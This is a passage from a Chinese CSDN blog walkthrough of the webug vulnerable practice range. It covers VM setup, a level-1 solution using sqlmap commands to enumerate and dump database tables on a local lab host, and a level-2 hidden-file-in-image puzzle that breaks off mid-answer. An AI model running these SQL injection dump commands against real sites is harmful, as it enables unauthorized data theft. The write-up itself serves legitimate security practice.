webug靶场渗透基础攻略

本文详细介绍了webug靶场的渗透基础攻略,从安装到逐步攻破各个关卡,涉及SQL注入、文件下载、XFF注入、CSRF攻击等技术。在实践中发现并利用了多个漏洞,如源代码泄露、权限越权、文件路径遍历等,揭示了靶场中常见的安全问题。
摘要由CSDN通过智能技术生成

安装

下载解压后,打开虚拟机
在这里插入图片描述
修改网络为桥接模式
在这里插入图片描述
虚拟机cmd中输入ipconfig查看局域网ip地址
在这里插入图片描述
我这边是192.168.0.101
浏览器访问一下
在这里插入图片描述
没毛病,第一步完成了,现在开始练习


第一关

在这里插入图片描述
这题目…一开始我就没明白要干什么
看了二三关的题目后,才明白过来是要找出id为1的值的flag
接下来我们使用sqlmap
查询当前的数据库名

sqlmap -u "http://192.168.0.101/pentest/test/sqli/sqltamp.php?gid=1" --current-db

在这里插入图片描述
查表

sqlmap -u "http://192.168.0.101/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab --tables

在这里插入图片描述
查字段

sqlmap -u "http://192.168.0.101/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab -T flag --columns

在这里插入图片描述
现在就可以查flag值了

sqlmap -u "http://192.168.0.101/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab -T flag -C flag,id --dump

在这里插入图片描述
答案就出来了,但是不用将这个值提交,因为看了源代码后发现提交页面并没有校验flag的功能,估计还没开发好


第二关

在这里插入图片描述
下载图片,用notepad打开一下
在这里插入图片描述
有个txt文件,解压后打开看看
在这里插入图片描述
貌似没更多信息
把’123’填入提交后,发现错了,再试’密码123’,‘123txt’都是错的,无奈下又看了下源代码,发现答案是’flang{fa136c7c341a6

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值